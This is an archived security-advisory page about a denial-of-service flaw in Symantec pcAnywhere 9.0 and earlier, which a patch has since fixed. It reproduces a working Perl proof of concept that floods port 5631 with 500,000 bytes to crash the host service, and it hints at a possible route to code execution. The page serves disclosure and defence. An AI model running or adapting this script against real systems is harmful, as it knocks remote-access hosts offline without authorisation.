Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows Net Apps :: pcaw9.htm

PCAnywhere 9.0 and earlier overflow crash exploit



Vulnerability

    pcAnywhere

Affected

    Symantec pcAnywhere 9.0 and earlier

Description

    Following is based on a Securax-SA-14 Security Advisory.  Symantec
    PcAnywhere is a program that will allow others (who are authorised
    to have access) to use your pc.  It's simular to a Windows NT  4.0
    terminal server.

    PcAnywhere (when it's configured to  'be a host pc') listens  on 2
    ports,  5631  (pcanywheredata,  according   to  nmap)  and   65301
    (pcanywhere).  And when a user sends certain data in a  particular
    way, pcAnywhere will crash.

    When a large amount (it  depends, sometimes the host will  go down
    with 320k characters, sometimes, you will have to send 500k  bytes
    of data) are sent to a 'waiting' host on the pcanywheredata  port,
    "AWHOST32.EXE" will crash,  and give an  error on the  screen, and
    write the "Unexpected program error" to a logfile (with EAX,  EBX,
    ... so  read them,  you'll find  the yummy  0x61616161).  Oh yeah,
    don't use uppercase characters, as PcAnywhere won't crash on them.

    The DoS code:

    #!/usr/bin/perl
    
    # Symantec PcAnywhere 9.0 Denial of Service
    # -----------------------------------------
    #          by incubus <incubus@securax.net>
    #                       http://www.hexyn.be
    #
    #                    http://www.securax.net
    # All my love to Tessa.
    # Greetz to: f0bic, r00tdude, t0micron, senti, vorlon, cicero,
    #            Zym0tic, segfault, #securax@irc.hexyn.be
    # Thanks to jurgen swennen, for letting me (ab)use his computer.
    #
    # this is intended as proof of concept, do not abuse!
    
    use IO::Socket;
    $host = "$ARGV[0]";
    $port = 5631;
    if ($#ARGV<0) {
    print "use it like: $0 <hostname>\n";
    exit();
    }
    $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "damn, ";
    print "hello\n";
    $buf = "";
    for($counter = 0; $counter < 500000; $counter++) {
            $buf .= "\x61";
    }
    print $socket "$buf\n";
    close($socket);
    exit();

    If someone exploits  this, than Symantec  is forced to  rename the
    name of  this product  to PcAnyoneAnywhere  or something...   This
    could lead to a compromise of a system.

Solution

    Symantec technicians have determined that this is the same problem
    originally  reported  in  BID  1150,  Denial  of  Service  Against
    pcAnywhere in which pcAnywhere 9.0 and earlier could be crashed by
    an nmap  scan.   This issue  was corrected  in Symantec pcAnywhere
    version 9.01.   PcAnywhere 9.01 through  current versions are  not
    vulnerable to this problem.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH